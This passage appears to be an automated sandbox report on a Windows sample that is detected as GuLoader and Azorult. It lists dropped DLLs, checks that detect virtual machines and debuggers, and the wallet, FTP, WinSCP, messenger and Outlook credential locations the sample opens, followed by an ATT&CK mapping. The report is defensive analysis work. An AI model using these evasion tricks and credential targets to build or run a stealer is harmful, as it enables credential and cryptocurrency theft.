          Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.279829002.000000001F3F8000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.3.dr
          Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: cjwe.exe, 00000003.00000003.296245442.000000001EB3C000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.3.dr

          Data Obfuscation:

          barindex
          Yara detected GuLoaderShow sources
          Source: Yara matchFile source: Process Memory Space: cjwe.exe PID: 6656, type: MEMORY
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
          Yara detected VB6 Downloader GenericShow sources
          Source: Yara matchFile source: Process Memory Space: cjwe.exe PID: 6656, type: MEMORY
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_0040356D push edx; ret 0_2_00403574
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_00404C76 push esp; retf 0_2_00404C7A
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_00401A1D push 0000002Bh; ret 0_2_00401A1F
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_00401C35 push ebp; retf 0_2_00401C3F
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_004056CD push 0000005Ah; ret 0_2_004056D8
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_00401AD0 push esp; retf 0_2_00401AE6
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_004053F9 push ss; retf 0_2_00405410
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_00403AB1 push ebp; retf 0_2_00403ABB
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_004033BE push esp; retf 0_2_004033CA
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\freebl3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-string-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\softokn3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\nssdbm3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\nss3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\ucrtbase.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\mozglue.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\msvcp140.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\vcruntime140.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeFile created: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: cjwe.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02230E22 rdtsc 0_2_02230E22
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\freebl3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-console-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-string-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\softokn3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\nssdbm3.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-util-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-file-l1-2-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DD440F6B\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
          Source: C:\Users\user\Desktop\cjwe.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
          Source: C:\Users\user\Desktop\cjwe.exe TID: 7104Thread sleep count: 145 > 30Jump to behavior
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: vmicvss
          Source: cjwe.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\cjwe.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging:

          barindex
          Contains functionality to hide a thread from the debuggerShow sources
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02230E22 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,000000000_2_02230E22
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\cjwe.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02230E22 rdtsc 0_2_02230E22
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02230E22 mov eax, dword ptr fs:[00000030h]0_2_02230E22
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02232E13 mov eax, dword ptr fs:[00000030h]0_2_02232E13
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02233107 mov eax, dword ptr fs:[00000030h]0_2_02233107
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_02231B7D mov eax, dword ptr fs:[00000030h]0_2_02231B7D
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_0223135F mov eax, dword ptr fs:[00000030h]0_2_0223135F
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_022335F7 mov eax, dword ptr fs:[00000030h]0_2_022335F7
          Source: C:\Users\user\Desktop\cjwe.exeCode function: 0_2_022335D0 mov eax, dword ptr fs:[00000030h]0_2_022335D0
          Source: C:\Users\user\Desktop\cjwe.exeProcess created: C:\Users\user\Desktop\cjwe.exe 'C:\Users\user\Desktop\cjwe.exe' Jump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected AzorultShow sources
          Source: Yara matchFile source: 00000003.00000003.295447945.000000001F41C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: cjwe.exe PID: 6896, type: MEMORY
          Found many strings related to Crypto-Wallets (likely being stolen)Show sources
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Exodus\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Exodus\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
          Tries to harvest and steal Bitcoin Wallet informationShow sources
          Source: C:\Users\user\Desktop\cjwe.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\cjwe.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
          Tries to steal Crypto Currency WalletsShow sources
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
          Tries to steal Instant Messenger accounts or passwordsShow sources
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
          Source: C:\Users\user\Desktop\cjwe.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Users\user\Desktop\cjwe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection11Virtualization/Sandbox Evasion22OS Credential Dumping1Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11Credentials in Registry2Virtualization/Sandbox Evasion22Remote Desktop ProtocolData from Local System3Exfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Credentials In Files1Process Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery23SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet